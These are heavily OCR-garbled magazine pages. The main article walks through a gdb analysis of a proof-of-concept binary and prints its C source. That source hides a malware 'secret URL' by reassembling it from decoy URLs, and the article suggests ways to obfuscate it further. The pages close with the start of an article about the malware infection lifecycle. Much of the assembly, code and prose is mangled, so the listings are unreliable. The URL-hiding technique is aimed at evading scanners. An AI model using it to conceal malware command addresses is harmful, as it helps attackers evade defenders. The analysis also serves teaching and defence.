0x63d(^ip),?feax 


# 


0Xl00000e3d 


<main+lll>: 


mov 


0x634(&rip),&rax 


# 


0xl00000e3e 


<main+122>: 


mov 


0x631 (&rip),ftrcix 


# 


0X100000646 


<main+133>: 


mov 


0x62f (&rip),?fecix 


# 


0xl00000e4e 


<main+142>: 


movzb L 


0x629(&rip),&ecix 


# 


0X100000652 


<main+152>: 


mov 


0x620(&rip),&rax 


# 


0X100000653 


<main+166>: 


mov 


0x61a(&rip),&rax 


# 


0xl00000e5b 


<main+180>: 


mov 


0x614(&rip),?&-cix 


# 


0X100000663 


<main+194>: 


movzb L 


0x60e(&rip),?fecix 


# 


0xl00000e6b 


<main+207>: 


mov 


0x602(&rip),&rax 


# 


0xl00000e6c 


<main+221>: 


mov 


0x5fc(&rip),&rax 


# 


0X100000674 


<main+235>: 


mov 


0x5f6(^ip),^rax 


# 


0xl00000e7c 


<main+249>: 


mov 


0x5f0(^ip),SSrax 


# 


0X100000684 


<main+263>: 


mov 


0x5ea(&rip),&rax 


# 


0Xl00000e8c 


-diiain+277>: 


mov 


0x5e5(^ip),ffeax 


# 


0X100000694 


-diiain+286>: 


movzw L 


0x5df (^ip),Steax 


# 


0X100000698 


-diiain+297>: 


mov 


0x5d6(^ip),^ax 


# 


0xl00000e9a 


<main+311>: 


mov 


0x5d0(J&-ip),?tirax 


# 


0xl00000ea2 


<main+325>: 


mov 


0x5ca(J^ip),?Srax 


# 


0xl00000eaa 


-diiain+339>: 


mov 


0x5c5(^ip),?feax 


# 


0xl00000eb2 


-diiain+351>: 


mov 


0x5bc(^ip),?Srax 


# 


0xl00000eb6 


<main+365>: 


mov 


0x5b6(^rip),Krax 


# 


0xl00000ebe 


<main+379>: 


mov 


0x5bl(&rip),?fecix 


# 


0X1000006C6 


<main+391>: 


movzw L 


0x5a8(?^rip),?feax 


# 


0xl00000eca 


<main+405>: 


movzb L 


0x59c(^ip),?feax 


# 


0X1000006CC 


<main+418>: 


mov 


0x590(^ip),?^rax 


# 


0Xl000006Cd 


<main+432>: 


mov 


0x58a(^ip),?^rax 


# 


0xl00000ed5 


<main+446>: 


mov 


0x584 (Wip),ftrax 


# 


0xl00000edd 


<main+460>: 


mov 


0x57f (^ip),Keax 


# 


0X100000665 


<main+472>: 


movzw L 


0x576(^ip),?feax 


# 


0X100000669 


<main+1431>: 


Lea 


0xc8(?^ip) ,&rcx 


# 0xl00000dfa 


<main+1466>: 


mov 


0x2bb(^ip),?^rdx 


# 0X100001010 



Figure 6. 5trings1.txt listing created using grep # 

also make note of a few function calls: sprintf, strcpy, 
sscanf and parse_url. Three of these four look quite 
familiar but what is parse urio? It sounds like it parses 
the url so we'll find out later. 

We feel pretty satisfied with what we've found so 
far so now it is time to run this executable through the 

™) O Ql string 5 l.gdb 

0X100001010 
0X100000613 
0Xl000006lb 
0X100000623 
0X100000627 
0X100000629 
0X100000631 
0X100000639 
0Xl00000e3d 

0xl00000e3e 

0X100000646 

0xl00000e4e 

0X100000652 
0X100000653 

0xl00000e5b 

0X100000663 

0xl00000e6b 

0Xl00000e6c 
0X100000674 
0Xl00000e7c 



x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 
x/s 



0X100000694 
0X100000698 
0Xl00000e9d 



0xl00000eb2 
0xl00000eb6 
0xl00000ebe 



0X1000006CC 



0X100000665 
0X100000669 

0xl00000dfa 

0X100001010 



Figure 5. Disassemble secreturl binary with gdb debugger 



Figure 7. Stringslgdb gdb script file extrapolated from stringsl.txt 



www.hakin9.org/en 



Hanin9 



ATTACK 



0X0000000100B00CfC <mai 



n+1384>: 



'■ 0 Mil-, l , £ ■ { I! ^ ^ ft . : .i 



n+1392>: 
n+1397>: 



mov 
mov 
mov 
mov 
mov 



i <main+1402>: Lea 



0X0000000100000dla -=3iiai 



■ ,''>-.,. ', 1 .-V,,. 



n+1409>: 
n+1414>: 



n+1425>: 
n+1428>: 



mov 
mov 
niov 



0x0000000100000d37 <mai 



mov 
niov 

0X0000000100000I.13C -=JlM3 1 ri+1448> '• tl'lOV 



n+1438>: 
n+1443>: 



Mecx,0x30(Mrsp) 

Mesi ,0x28(Mrsp) 

Medi ,0x20(Krsp) 

Mr8d,0xl8(Mrsp) 

Mr9d,0xl0(Mrsp) 

-0x1210 (Mrbp), Mrax 

Mrax, 0x8 (Mrsp) 

-0x6e0 (Mrbp), Mrax 

Mrax,(Mrsp) 

Mrl0,Mr9 

Mrll,Mr8 

0xc8(Mrip),Mrcx 

$0xf f ,Medx 

$0x0,Mesi 

Mrbx,Mrdi 

$BKB ) ftiogK 



Tf •■ ^ ■ 



caL Lq 
tiiot 

mov 
mov 
xor 
je 

caL Lq 

add 

pop 

Leaveq 

retq 



_sprintf_chk> 



0xl00000d6e <dyLd_stub_. 
$flAO,fld e iu 

0x2bb(Mrip),Mrdx # 0x100001010 

-0x18 (Mrbp ),Mrcx 

(Mrdx),Mrcx 

0xl00000d63 <main+1487> 

0xl00000d74 <dyLd_stub stack_chk_f ai L> 

$0xl3e8,Mrsp 
Mrbx 




Figure 8. Memory contents revealed using gdb'sx/s command 

gdb debugger: gdb secreturl the simplest place to start 
is of COUrSe main ( ) and start our disassembly there: 
disassemble main (Figure 5) right away we notice 
string references. We need to know what those strings 
are so we select all the terminal text, copy and paste 
to a temporary file called disdump1.txt and use grep 



0X100000652 : 
0X100000653 : 

0xl00000e5b : 

0X100000663 : 

0xl00000e6b : 
0xl00000e6c : 
0x100000674 : 
0xl00000e7c : 

0X100000684 : 

0xl00000e8c : 
0x100000694 : 

0X100000698 : 

0xl00000e9a : 
0xl00000ea2 : 
0xl00000eaa : 
0xl00000eb2 : 
0xl00000eb6 : 
0xl00000ebe : 
0xl00000ec6 : 
0xl00000eca : 

0X1000006CC : 

0xl00000ecd : 
0xl00000ed5 : 
0xl00000edd : 

0X100000665 : 

0xl00000dfa: 
'UxlUUUUlUld: 
(gdb) | 
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"http://www.fc iaekhcsi .: 
"ww.bLackhat.com" 



"http ://www .def con .org" 
"ww.defcon.org" 



" http : //www . tw i tter . org " 
"ww.twitter.org" 



"http ://www .1234567890 .examp Le 
"ww .1234567890 .examp Le" 
" 67890. examp Le" 



Figure 9. Interesting structure at OxlOOOOOdfa found with x/s 

I © ^ O Terminal - gdb-i386-apple-d - 88x29 



0X00000B01000009C4 ■ 
0X0000B001000009C7 ■ 
0X0000000100000900 ■ 
0X00000001000009cf • 
0X00000001000009d6 ■ 
0X00000001000009dd ■ 
0X00000001000009e4 - 
0X00000001000009eb • 
0X00000001000009f2 ■ 
0X00000001000009f6 ■ 
0X00000001000009fd ■ 
0X0000000100000002 • 
0X0000000100000009 ■ 
0X0000000100000O0d ■ 
0X0000000100000010 ■ 
0X0000000100000013 • 
0X0000000100000016 ■ 
0X0000000100000019 ■ 
0X0000000100000OlC ■ 
0X0000000100000Olf ■ 
0X0000000100000024 ■ 
0X0000000100000O2b ■ 
0X0000000100000032 ■ 
0X0000000100000039 • 
0X0000000100000040 • 
0X0000000100000047 ■ 
0X0000000100000a4b ■ 
0X0000000100000052 ■ 
0X0000000100000057 ■ 



-0x600 (Mr bp ),Mrsi 

-0x1330 (Mr bp ),Mrdi 

-0x210(Mrbp),Krl0 

-0x30(Mrbp),Mrll 

-0xde0(Mrbp),Mrax 

Mr ax, 0x8 (Mr sp) 

-0xl2a0 (Mr bp ) , Mrax 

Mrax,(Mrsp) 

Mrdx,Mr9 

Mrcx,Mr8 

Mrsi ,Mrcx 

Mrdi ,Mrdx 

Mrl0,Mrsi 



-0x1220 (Mr bp ),Mrcx 
-0x670 (Mr bp), Mrsi 
-0x1340 (Mr bp), Mrdi 
-0x280(Mrbp),Mrl0 
-0x50(Mrbp),Mrll 
-0xe50 (Mr bp), Mrax 
Mr ax, 0x8 (Mr sp) 
-0xl2b0(Mrbp),Mrax 



Figure W.Sprintf function call 

to extract all prefixed hash lines to another file called 
strings1.txt with this command: grep disdumpl . txt> 
stringsi.txt (Figure 6) We can certainly do more 
manipulation all in a single line of bash but it is good to 
have the workflow in steps and maintain artifacts in a 
manageable fashion for later use. 



& O n 
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0X0000000100000C:f 8 dllO i 


n+1380> 


mov ?;:ecx,8x30(Mrsp) 


S 


0X0000000100000C:f C -dllO i 


n+1384> 


mov Mesi ,0x28(Mrsp) 




8x8808880i8i3688d88 <sstai 


n+1388> 


mov ?-fed i , 0x20 (Mr sp ) 




0x0000000100000d04 <moi 


n+1392> 


mov Mr 3d, 0x18 ( Mr sp) 




0X0000000100000d09 -dflOi 


n+1397> 


mov Mr9d,0xl0(Mrsp) 




■1;: 0'-'0!j0'-'9 ! 0 r '8"'!>7- ii).-: ■ -1.1:1 'I 


n+1402> 


L ea -0x1210 (Mrbp ) , Mrax 




0X0000000100000dl5 -dflOi 


n+1409> 


mov Mr ax, 0x8 (Mr sp) 




0x0000000100000dla <mai 


n+1414> 


Lea -8x6e8(Mrbp),Mrax 




0X0000000100000d21 Orttii 


n+1421> 


mov Mr ax, (Mr sp) 




0X0000000100000d25 <mai 


n+1425> 


mov Mrl0,Mr9 




0Y00000001 00000d?R ^mni 


n-i-1 4?R->. 


mnv Mr11 pMrFi 




9x8S0S8eei898e0d2r.i «daai 


n+1431> 


Lea 0xc8(Mrip),Mrcx # 0xl00000dfa 




!5X88»88881H8M«Ba:v <?H3 >. 


n+1438> 


mov $0xff,Medx 




0x0000000100000d37 <mai 


n+1443> 


mov $0x0,Mesi 




0x0000000100000d3c <mai 


n+1448> 


mov Mrbx,Mrdi 




0x0000000100000d3f <mai 


n+1451> 






0. ,0U8£i0li& 3> = jat! : ;:cl4 =s -:;ii-.M 


n+1456> 


caLLq 0xl000B0d6e <dy Ld_stub__|sprintf [chk> 




■j: 'Xnsuiyjui'.i-.O'.it'Jf.-' .j»r\ 


n+1461> 


mov $0x0,Meax 




wx88idy88UiW8(jywcH-e <®ai 


n+1466> 


mov 0x2bb(Mrip),Mrdx # 0x100001010 




0x0000000100000d55 <mai 


n+1473> 


mov -0x18 (Mrbp ) , Mr cx 




0x0000000100000d59 <mai 


n+1477> 


xor (Mrdx),Mrcx 




0X0000000100000d5c -dflOi 


n+1480> 


je 0xl000B0d63 <inain+1487> 




0x0000000100000d5e <mai 


n+1482> 


ca L Lq 0xl000B0d74 <dy Ld_stub stack_chk_f ai L> 




0X0000000100000d63 <mai 


n+1487> 


add $0:>:13e8,Mrsp 


G 


0x0000000100000d6a <mai 


n+1494> 


pop Mrbx 


0X0000000100000d6b -dllO i 


n+1495> 


Leaveq 


■ i ri'",i", .1 t, 1 ".r<","i ■-. 


n+1496> 


retq 




End of assembler dump. 

(gdb) 






¥ 

_ 



Figure 12. Setting breakpoint after sprintf call 
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rbx 
rex 


0x7fff 

0X0 


5fbfe650 

0 


rdx 


0x15 


21 


rsi 


0x7fff 


5fbfeSa3 


rdi 


0X0 


0 


rbp 


0x7fff 


5fbff840 


rsp 


0x7fff 


5fbfe450 


r3 


8x7fff 


5fbff6a0 


r9 


8x7fff 


5fbfe4c0 


rl0 




rll 


8x7fff 


5fbfe662 


rl2 


0X0 


0 


rl3 


0X0 


0 


rl4 


0X0 


0 


rl5 


0X0 


0 


rip 


0X1000 


00d49 


ef Lags 


0x202 


514 


cs 


0x27 


39 


ss 


0X0 


0 


ds 


0X0 


0 


es 


0X0 


0 


fs 


0X0 


0 


gs 


0X0 


0 


(gdb) [77s 


0x7fff5fbfe 


650 


0x7fff5ft 


fe650: "htt 


p://www. 



140734799799906 

0xl00000d49 <main+1461> ^^^r 



Figure 10. Parse_url function called 9 times 



Figure 13. Examing memory address 0x7fff5fbfe650 



34 



Hamn9 



8/2010 
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3 Q 
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r3 


0x7ff 


f5fbff6a@ 140734799864064 


B 


r9 


0x7ff 


f5fbfe4c( 


5 140734799799488 




rlB 


9x183698612 


4294970898 | 




rll 


0x7ff 


f5fbfe66; 


> 140734799799906 




rl2 


0X0 


0 






rl3 


0X0 


0 






r!4 


0X0 


0 






rl5 


0X0 


0 






rip 




0xl00000d49 <main+1461> 




ef lags 


0x202 


514 






cs 


0x27 


39 






ss 


0X0 


0 






ds 


0X0 


0 






es 


0X0 


0 






fs 


0X0 


0 






gs 


0X0 


0 






(gdb)| x/lls 6 










0xlB0000el2: 












0xl00000el3: 


"ht 


tp://www 


google.com" 






0xl00000e29: 


"ht 


tp://www 


yahoo.com" 






0xl00000e3e: 


"ht 


tp://www 


appLe.com" 






0X100000653: 


"ht 


tp://www 


microsoft.com" 






0xl00000e6c: 


"ht 


tp://www 


bLackhat.com" 






0X100000634: 


"ht 


tp:/Aw 


defcon.org" 






0xl00000e9a: 


"ht 


tp://www 


israeLtorres.org" 






0xl00000eb6: 


"ht 


tp://www 


twitter.org" 




*J 


0xl00000ecd: 


"ht 


tp:/7www 


1234567890.exampLe" 




w 


(gdb) 







Figure 14. Url list contained at OxlOOOOOeU 



Li findsecreturkgdb 



isassembLe main 
break *0x0000000100000d49 
r 

info reg 

x/s 0x7fff5fbfe650 

X/llS 0x100000612 



Figure 15. Findsecreturl gdb command listing batch script 



We now want to extract and modify the strings1.txt 
text file into a simple gdb script file so we can have gdb 
do all the dirty work in batch and not in a tedious manual 
fashion by using the command: cat stringsl.txt | cut - 

d -f 2 | sed *s/ /x\/s /g' > stringsl.gdb (Figure 7) 

As part of the output we've prefixed x / s to each line to 
examine memory strings and give us a readable set 
of results. We now can run this gdb script using the 

following command: gdb secreturl -x stringsl.gdb (Figure 

8) and immediately see the interpreted results of the 
memory contents. At this point everything matches 
what we've expected and now (Figure 9) we see where 
oxiooooodfa: i %s%s%s%s%c%c%c%c%c%c%s%s (previously noted 
from the strings dump) fits into the picture (literally). 
We'll note it as some type of specifier until we see more 
of what's going on. 

Now that we're satisfied with what the string references 
revealed let's examine the maino disassembly further. 
Scrolling down our disassembly dump we see calls to 

parse url ( ) : callq 0x10000067c <parse url> (Figure 10) 

in fact there are 9 of these calls out of the 11 total calls 
in main ( ) . Currently parse urio isn't interesting enough 
to disassemble but we'll remember to backtrack to this 
function if necessary. As we continue the second to the last 
call is to sprintf ( ) (Figure 11) prior to this call at oxiooooodfa 



• no 



c secreturl. c 



* ► ft secreturl ,c:L9 i <No selected symbol > t 



// secreturl. c vl.B Armoring Malware Point of Concept (PoC) by Israel Torres hakin9igi-: rae Ltor res, or g 
#include <stdio. h> 
#include <st ring. h> 

#define MX_B8 100 
#define MX_B1 4 
#define MX_B2 IBB 
#define MX_B3 2 
#define MX_B4 100 
#define MX_B5 2 
#define MX_B6 100 
#define MX_UR 255 

// Parse URL into resuable blocks 

void parse_url(char url[] p char blkB[] p char blkl[], char blk2[] p char blk3 [] , char blk4 [] , char blk5[] p char blk6[]){ 
st rcpytblkl ,"://") ; strcpy (blk3 p " . " ) ; strcpy (blk5 p ".") ; 

sscanf (url, "%99 [": ] : //%99 . |.%S9t A .] .%Mt*\nl", blkB, blk2 p blk4 p blk6) : 

> 

I 

// Start Here 
int main (J 

{ // Arbitrary Target Site Deception List 
char arbA[]="http: //www. google. com" ; 
char arbB []="http: //www. yahDD. com" ; 
char arbC []="http: //www. apple. com" ; 
char arbD []="http: //www. microsoft. com" ; 
char arbE[]="http: //www. blackhat. com" ; 
char arbF []="http: //www. def con. org" ; 
char arbG []="http: //www. is rae It or res. org" ; 
char arbH []="http://www. twitter. org" ; 
char arbl []="http: //www. 12345B7B90. example" ; 
// Create Grid 

char blk0_A[MX_B0] , blk0_B [MX_B0] , blk0_C [MX_B0] p blk0_D [MX_B0] p blk0_E [MX_B0] , 
char blkl_A[MX_Bl] , blkl_B [MX_B1] P blkl_C [MX_B1] , blkl_D [MX_B1] , blkl_E [MX_B1] r 
char blk2_A[MX_B2] , blk2_B [MX_B2] , blk2_C [MX_B2] , blk2_D [MX_B2] , blk2_E [MX_B2] , 
char blk3_A[MX_B3] , blk3_B [MX_B3] , blk3_C [MX_B3] , blk3_D [MX_B3] , blk3_E [MX_B3 ] , 
char blk4_A[MX_B4] , blk4_B [MX_B4] , blk4_C [MX_B4] P blk4_D [MX_B4] , blk4_E [MX_B4 ] , 
char blk5_A[MX_B5] , blk5_B [MX_B5] , blk5_C [MX_B5] , blk5_D [MX_B5] , blk5_E [MX_B5] r 

blk6_C[MX_B6] P blk6_D[MX_B6] , 



lc T |#J m la 



blk6_E[MX_B6] , 



char blk6_A[MX_B6] , blk6_B [MX_B6] 
// Parse List and Populate Grid 

parse_url(arbA p blkB_A p blkl_A p blk2_A p blk3_A p blk4_A p blk5_A 

parse_url(arbB p blk0_B p blkl_B p blk2_B p blk3_B p blk4_B p blk5_B 

parse_url(arbC p blkB_C p blkl_C p blk2_C, blk3_C p blk4_C, blk5_C 

parse_url(arbD p blk0_D p blkl_D p blk2_D p blk3_D p blk4_D p blk5_D p blk6_D); 

parse_url(arbE p blk0_E p blkl_E p blk2_E p blk3_E p blk4_E p blk5_E p blk6_E) 

parse_url(arbF p blkB_F p blkl_F p blk2_F p blk3_F p blk4_F p blk5_F 

parse_url(arbG p blkB_G p blkl_G p blk2_G p blk3_G p blk4_G p blk5_G 

parse_urltarbH p blkB_H p blkl_H p blk2_H p blk3_H p blk4_H p blk5_H 

parse_url[arbl p blkB_I p blkl_I p blk2_I p blk3_I p blk4_I p blk5_I 
// Reuse Grid Content to Recombine Secret URL 
char secret_url[MX_UR] ; 

sprintf (sec ret_url p "Sss^s^s^s^c^c^cSisc^c^c^sSes" 

p blkB_A p blkl_G p blk2_D p blk3_B p blk4_E[5] p blk4_C[8j p blk4_E[4] 
//printf ("%s\n" p secret_url) ; // prints htt p: / /www, hakin9.org 
return 8; 



blk0_F[MX_B0l , blk0 

blkl_F[MX_Bl] , blkl 

blk2_F[MX_B2j , blk2 

blk3_F[MX_B3] , blk3 

blk4_F [MX_B4] , blk4 

blk5_F[MX_B5] , blk5 

blk6_F[MX_B6j , blk6 



G[MX_B0] p blk0_H[MX_B0] , 

G[MX_Bl] r blkl_H[MX_Bl] , 

G[MX_B2] , blk2_H[MX_B2] , 

G[MX_B3J P blk3_H[MX_B3] , 

G[MX_B4] P blk4_H[MX_B4] P 

G[MX_B5] P blk5_H[MX_B5] r 

G[MX_B6] P blk6_H[MX_B6] , 



blk0_I[MX_B0] 
blkl_I[MX_Bl] 
blk2_I[MX_B2] 
blk3_I[MX_B3] 
blk4_I[MX_B4] 
blk5_I[MX_B5] 
blk5_I[MX_B6] 



blk6_A) ; 
blk6_B] ; 
blk6_C] ; 



blk6_F) ; 
bLk6_G) ; 
blk6_H) ; 
blkfi I] : 



blk4_G[0] p blk4_F[5] p blk4_I[B] p blk5_H p bLk6_F); 



Figure 16. Secreturl C source listing 
www.hakin9.org/en 
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LPObscure.txt 



PObscure - IP Obscurity Tool vl.6.2 
http ://too Ls . israe Itorres .org 
usage: 

IPObscure.exe [command [n] ] [iplhost] 

commands: ( append "n" to the command for new line in output ) 

-dip convert IP to dot Less [192.0.34.166] -> [3221234342] 

-hip convert IP to hex [192.0.34.166] -> [6xC86822A6] 

-hip2 convert IP to hex [192.6.34.166] -> [C66622A6] 

-hip3 convert IP to hex [192.6.34.166] -> [6xC6. 8x86. 6x22. 6xA6] 

-oip convert IP to octal [192.6.34.166] -> [6368.868.842.6246] 

-oip2 convert IP to octal [192.6.34.166] -> [386868642246] 



secreturl ur\ lis t-4 - mapping variants.txt 



o 



Figure 17. Ipobscure example 



ft y secreturl url list! - plain.txt 



http ://www .goog le .corn 

http : //www .yahoo .corn 

http : //www . app L e . corn 

http : //www . rn i crosof t . corn 

http ://www .b Lackhat .corn 

http : //www . def con . org 

http : //www . israe Ltorres .org 

http : //www .twitter .org 

http : //www .1234567390 .exarnp Le 



Figure 18. Secreturl url listl - plain 
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url Iist2 - parsed urls.txt 




A http 


// 


www 


google 


com 




B http 


// 


www 


yahoo 


com 




C http 


// 


www 


apple 


com 




D http 


// 


WWW 


microsoft 


com 




E http 


// 


www 


b lackhat 


com 




F http 


// 


www 


def con 


org 




G http 


// 


www 


israe Itorres 


org 




H http 


// 


www 


twitter 


org 




I http 


// 


WWW 


1234567890 


example 




[0] 


;i] 


P] [3] 


[4] [5] 


[6] 





Figure 19. Secreturl url Iist2 - parsed urls 
is our string-character specifier. We're interested in 
knowing what populates the specifier string and using the 
debugger we can find out. The simplest way is to set a 
breakpoint immediately after the call to sprintf ( ) . 

x0000000100000d44 <main+1456> : ! 

callq 0xl00000d6e <dyld_stub sprintf_chk>$OxO , %eax 

(Figure 12) which is 

0x0000000100000d49 <main+1461> : ! mov 

in our gdb session we type in: break *oxoooooooioooood49 
and type in r to run. The executable runs and hits the 

breakpoint We Set: Breakpoint 1, 0x0000000100000d49 in 

maino; this means our registers of interest are at the 
point we want them and can now interrogate them 
further using the info reg gdb command. (Figure 13) 
We start with rbx: 

rbx 0x7fff5fbfe650! 1407347 997 99888 



[0]A0 [1]G0 [2]DB [3]B0 [4]E5 [4]C0 [4]E4 [4]G0 [4]F5 
[4] 18 [5]H0 [6]F0 

[0]A0 [1]G0 [2]D0 [3]BB [4]E5 [4]C0 [4]E4 [4]G0 [4]F5 [4] IS [5]H0 [6]F0 

0A01G02D03B04E54C04E44G04F54I85H06F0 

[0]A0 
[1]G0 
[2]D0 
[3]B0 
[4]E5 
[4]C0 
[4]E4 
[4]G0 
[4]F5 
[4]I3 
[5]H0 
[6]F0 

0A0 
1G0 
2D0 
3B0 
4E5 
4C0 
4E4 
4G0 
4F5 
418 
5H0 
6F0 



Q r> n 


_ secret j rl ml list3 


- recombing secret url. bet 






http :// 


www . h a 


k i n 9 


org 




[0]AB [1]GB 


[2]D@ [3]B0 [4]E5 [4]C0 


[4]E4 [4]G0 [4]F5 [4] 18 


[5]H0 [6]F0 




1 2 


3 4 5 6 


7 8 9 10 


11 12 















Figure 20. Secreturl url Iist3 - recombing secret url 
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Figure 21 . Secreturl url Iist4 - mapping variants 
and to examine it's content use x/s: 

x/s 0x7fff5fbfe650 

which returns: 

0x7fff5fbfe650 : ! „http : //www . hakin9 . org" 

To quote Archimedes Eureka - we've found it! Our 
secret url is http://www.hakin9.org (I always suspected 
something was up with those guys ;) in rio there is 
oxioooooei2 which when using x/iis oxioooooei2 we reveal 
our original url list (Figure 14) - but it is still missing 
hakin9.org (the secret url). This means a scanner 
scanning for url strings won't find it unless they run it in 
memory first (like we did with gdb). Creating a simple 
gdb script called findsecreturl.gdb we can now play 
this artifact back at any time (Figure 15) 

We now could further analyze the rest of the functions 
and eventually put together how we are hiding the 
secret url but will leave that up to you. ;p 

Example Ma I ware Creation Concept 

Spoiler Alert: here's the source created for this exercise 
that reuses and reassembles something from nothing. 
(Figure 16) compile with: gec -o secreturl secreturt.c 

We start at the source by making sure our arbitrary 
list contains all the characters we need for our secret 
url(s). Randomly picked from history helps make them 
appear more benign - note they don't need to be limited 
to domain names only; greater schemes can 
contain full path names, etc. (Figure 18) 

As suspected the parse_url function 
parsed the urls so that when passed in they 
would appear logically as this tab delimited 
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table appears (cleaned up for readability). Notice the 
A-l alphabetical listing per URL (row) and the zero- 
based columns to separate common chunks of data - 
complexity could include different protocols, separator 
units, data compression. The diversion here is to be 
able to connect to different parts of data points so that 
we don't leave an easy to follow trail (for example if we 
always referenced http from column 0 row A... we have 
open choices; and could even construct this string using 
the same technique we did for the domain name in the 
secret url (Figure 19). 

We further demonstrate in how we reference to 
the rows and columns to graph out the secret url; for 
consistent purposes we tokenize 0 for strings so they 
keep the same length when compared to the individual 
characters; fur further obfuscation they could contain 
pseudo-random characters as they get stripped off 
anyway and only complicate analysis (Figure 20). 

We could add variants when it comes to send a 
message to the malware to update it's secret urls but 
sending it a new data map instruction set (Figure 21). 

Even further obfuscation could include using 
functions like ipobscure to obscure how the IP address 
is translated (hex, octal, dotless decimal). 

Conclusion 

As you see it doesn't matter that the listed sites are 
taken down/sinkholed; they are pretty much arbitrary 
as their primary objective is (while at rest) to contain 
the necessary characters to be reused to recombine 
a new secret URL using this type of ransom-note 
style mapping technique. This protects the secret 
url from being discovered until an update is required 
and the process updates it's mapping. The secondary 
objective is to serve as a distraction. The trinary 
objective is to have fun taking down competitors/ 
opponents sites. ;) 
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Is Anti-virus Dead 



The answer is YES. Here's why. . . 



There have been billions of dollars in damages caused 
by exploiters on the Internet These exploiters are 
intelligent cyber terrorists, criminals and hackers 
who have a plethora of tools available in their war 
chest - ranging from spyware, rootkits, trojans, 
viruses, worms, zombies and botnets to various 
other blended threats. From old viruses to these 
new botnets, we can categorize them all as 
malware. 




What you will learn... 

• The Laws of Malware 

• Proactive Defenses against Zero-day Malware 



What you should know... 

• Scanning for Vulnerabilities 

• How to run a Virus Scanner 



To cope with this cyber mess, we must first 
understand it. How does malware function? 
How is it designed? After years of cyber- 
crime research and testing destructive malware I've 
discovered the commonalities among all of these 
horrible pieces of code - I call my discovery The Laws 
of Malware. 

Before I get into these laws, let me give you some 
shocking recent statistics on Malware. 

In a recent report, 48% of 22 million scanned 
computers were infected with malware. The recently 
released APWG Phishing Activity Trends Report, 
detailed record highs in multiple phishing vectors, but 
also had some interesting information on malware 
infections (source: http://www.antiphishing.org/). 
According to the report, the overall number of 
infected computers used in the sample decreased 
compared to previous quarters, however, 48.35% of 
the 22,754,847 scanned computers remain infected 
with malware. What this tells us is that the traditional 
INFOSEC countermeasures - firewalls, intrusion 
detection systems, intrusion prevention systems and 
anti-virus systems can't keep up with the latest, more 



intelligently developed and dynamic malware threats 
(see Figure 2). 

And despite that the crimeware/banking trojans 
infections slightly decreased from Q2, over a million 
and a half computers were infected. What's even more 
frightening is that over 30,000 computers are being 
infected with malware daily, while they are still running 
some form of anti-virus software. 

According to the experts at FireEye, Understanding 
the Modern Malware Infection Lifecycle is key to 
designing and deploying effective defenses to protect 
your network and users from attack and theft (see http:// 
www.modernmalwareexposed.com). 

Let's take a closer look at Figure 3, above: 

First, in Figure 3, item (1 ) the employee gets exploited 
by casual browsing, clicking on links in what appear 
to be trusted sourced emails, via socially engineered 
binaries. Some of the most recent attacks have PDF files 
attached with powerful exploit code, taking advantage 
of the Common Vulnerability and Exposures (CVEs) in 
the Adobe Acrobat viewer. During the rendering of the 
PDF, the Acrobat viewer is exploited and the dropper is 
planted. 



Hanin9 



8/2010 



Is Anti-virus Dead 



Second, in Figure 3, item (2) this dropper malware 
installs from a compromised web site that appears to 
anti-virus content filters and proxy servers to be safe 
sites onto the employees computers. This process uses 
signature evading techniques and take advantage of 
both known and unknown vulnerabilities. Intelligently, 
this new wave of modern malware can remain inactive, 
appearing to be dorman, for some period of time before 
being activated. 

Third, in Figure 3, item (3), the malware kicks in 
and does its job to steal data and in many cases 
deploy follow-on infections, propogating to SMB 
servers and embedding into trusted Word, Excel, 



AV-Test.org's Sample Collection Growth 




■ Actual balarvie 
-Forecast 



Figure 1. AV-Test.org Sample Collection Growth (source: http://www.av-test.org/) 

Intrusion Prevention / Antivirus 

Effectivity vs. Modern Malware 



100% 




CONVENTIONAL^- 



CHARACTERIZATION OF M ALWA R E 



Figure 2. Effectiveness against today's malware (source: http:// 
modernmalwareexposed. org/) 



Powerpoint and PDF files, among other trusted 
format data files. Just one exploit can lead to many 
infections, while the malware uploads data it steals 
through key loggers and file grabbers, all under the 
noses of your traditional up to date firewall, patch 
management, intrusion detection system, intrusion 
prevention system and content proxy. 

It is obvious, from the success rate of today's 
malware attacks, as can be seen in the USA alone, 
at http://www.privacyrights.org that these INFOS EC 
countermeasures are failing. Yes, anti-virus is dead. 
If you wish to combat the latest malware - or even 
determine if it exists in your environment, you'll need 
to understand the basics. I've created 
the Laws of Malware to help you better 
understand how it functions and then 
I'll talk about a promising, automated 
solution to the problem. Malware 
exploits Common Vulnerabilities and 
Exposures (CVEs) 

Although there might be 9,000,000 
signatures in your McAfee or Symantec 
anti-virus scanner database (and 
growing exponentially), there are less 
than 50,000 CVEs. If you close just 
one CVE, for example, you can block 
more than 110,000 variants of the 
W32 malware. If you aren't visiting 
http://nvd.nist.gov to see what kind 
of exploitable holes you have in your 
network, cyber criminals who develop 
malware certainly are doing so on a daily 
basis. Remember, everything with an IP 
address has a CVE, you need to figure 
out which ones are critical holes and 
how to patch, reconfigure and remove 
them - i.e. system hardening. 

The Laws of Malware are derived 
from years of Information Security 
(INFOSEC) research. This paper 
explains these laws, which are 
six axioms about the behavior of 
malware. These laws, although 
initially described in this article for 
Hakin9 Magazine should continue to 
be in effect for generations to come 
based upon extrapolation of data 
which is independent of the timeline 
of the current malware trends. Insight 
from these laws should help security 
professionals to prevent malware 
outbreaks on their networks. In 
understanding these laws, one should 
be able to develop cleaner, healthier, 
stronger networks. 
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The Laws of Malware: The Six 
Axioms of Malware 
Behavior 

1. Creation 

2. Enumeration 

3. Growth 

4. Methodology 

5. Persistence 

6. Specificity 

If you feel my discovery is 
important enough to share with 
others, please give Hakin9 the credit they deserve for 
letting me share it with you as follows (source: Hakin9 
Magazine, Gary S. Miliefsky, The Laws of Malware). 
Now that we're past the formalities, let's dig in. 

• Malware Creation - Malware is created by cyber 
terrorists, criminals and hackers. Not all malware is 
created equal. Most are evolutionary improvements 
on existing malware. 

• Malware Enumeration - The average malware 
sample currently has a dozen names. Because 




Employee Gets Exploited: Malware '"Seed" Planted 

» Casual browsing 

* Links in targeted emails 

<■ Socially engineered binaries 




io ui Data Theft Et Follow-On Infections 

oads data stolen vta keyloqgers & file grabbei 
One exploit leads to dozens of infections 
■ Criminals have complete control over system 



Figure 3. Typical Malware Attack (source: http://www.fireeye.com) 



